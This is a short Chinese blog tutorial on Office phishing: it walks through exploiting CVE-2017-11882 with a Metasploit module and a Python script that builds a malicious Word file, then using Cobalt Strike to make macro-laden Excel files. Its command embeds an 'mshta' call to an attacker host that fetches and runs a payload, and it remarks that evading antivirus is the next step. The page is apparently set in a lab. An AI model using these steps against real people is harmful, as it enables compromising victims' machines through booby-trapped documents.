office简单钓鱼与cve2017-11882
office简单钓鱼与cve2017-11882
cve2017-11882
靶机 windows07
攻击机 kali
1)先下载msf payload与py生成的word
msf payload
https://github.com/0x09AL/CVE-2017-11882-metasploit
路径
cve_2017_11882.rb
放在usr/share/metasploit-framework/modules/exploits/windows/smb
cve-2017-11882.rtf
放在usr/share/metasploit-framework/data/exploits/
指令
mv cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
word py
https://github.com/Ridter/CVE-2017-11882/
生成word
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.5.102:8080/test" -o test.doc
2)配置msf
进入msf
依次
3)
将生成的t.doc放入win7,然后执行
这里我无法进入meterpreter,可直接退出,然后session查看
利用cs生成office宏
复制cs代码,然后保存为启用宏的excel
打开,会有禁用宏,然后启用。cs上线
利用宏的方式必须启用。
这两种皆会被查杀,需考虑免杀问题。
office简单钓鱼与cve2017-11882相关推荐
- 红队简单钓鱼实战---office宏
前言 本文发布已获得本人授权!本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担. 一.office宏介绍 宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人 ...
- CS制作office宏病毒钓鱼
一.实验目的 1. 利用CobaltStrile生成word宏病毒的钓鱼payload,实现远程控制对方主机 二.实验器材 1.vmware 15.5 2.kali linux 3.cobaltstr ...
- 使用setoolkit制作简单钓鱼网站
setoolkit 构建钓鱼网站 输入setoolkit打开框架 输入1 输入2 输入3 输入1 输入本机IP 输入2 在本机谷歌浏览器进行访问 输入email和password登录
- Windows下用某品牌随身WiFi搭建一个钓鱼热点
*本文原创作者:Leslie___Cheung ,本文属于原创博客,未经许可禁止转载. *本文内容仅代表作者观点且只做测试展示,目的是提醒读者注意 WiFi 联网安全,严禁将内容用于不法用途. 目录 ...
- DEFCON CHINABCTF的一些随笔
萌新的第一次线下决赛,毫无意外的被打爆,打扰了我太菜了,告辞! 下面记录一下这次的收获吧. 靶场渗透 这次靶场是打的真的爽,也学习了很多东西.从一个博客开始到服务器到内网最后拿域控权限,打的真的爽啊. ...
- 重建SYSVOL和NETLOGON共享
重建SYSVOL和NETLOGON共享<?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office& ...
- 财务管理专业计算机要学什么,我是学财务管理专业的,我想考计算机二级,请问考哪个比较好...
我是学财务管理专业的,我想考计算机二级,请问考哪个比较好以下文字资料是由(历史新知网www.lishixinzhi.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧! 我是学财务管理专 ...
- 【资源总结】前端资源收集
前端摸索过程插件学习与解决方法记录下来: 一:前端资源 1.软实力 1.1:开发人员的必备技能 http://blog.csdn.net/powertoolsteam/article/details/ ...
- 计算机二级wps和c语言,2021年3月计算机二级要报名了。报哪一科呢?要不要报名二级WPS?...
2021年3月计算机二级要报名了,详细点下面: 那么,该报名哪一科呢?二级office,这次不好考二级Office,今年第一次改Office 2016 虽然题库都会更新为2016版, 然而题目和评分变 ...
最新文章
- 大数据学习笔记二:Ubuntu/Debian 下安装大数据框架Hadoop
- Mallet Java【Windows下配置】(解决Ant安装可能会失败的解决方案)
- python的实现和测试是啥意思_Python接口自动化测试之pytest与unittest区别
- python输入输出有问题_使用pySerial从Python获取输入/输出错误
- 服务器的图片无法显示,服务器的图片无法显示
- Arrays工具类和二维数组
- UWP 使用exe程序
- 计算机wps如何排序,wps怎么排序【解答方案】
- 利用 filter 机制 给 静态资源 url 加上时间戳,来防止js和css文件的缓存,利于开发调试...
- php版ueditor配置_ThinkPHP配置UEditor
- 在职工程师如何在乾颐堂通过HCIE认证考试一瞥(王IE战报)
- 小程序源码:王者荣耀战力查询微信小程序源码下载支持安卓苹果微信QQ等多区查询
- SharePoint Designer定制MOSS/WSS表单页面
- 调色盘——将真彩色图像降级为低分辨率图像的八叉树算法
- 线上收单和线下收单的区别
- 虾皮的注册流程是什么?怎么注册虾皮?
- NewStarCTF 公开赛赛道 WEEK2 pwn 砍一刀
- 为什么打开wps文字背景是绿色的?怎么变成白色的呢?
- scrum立会报告+燃尽图(第二周第三次)
- SpringMVC超详细入门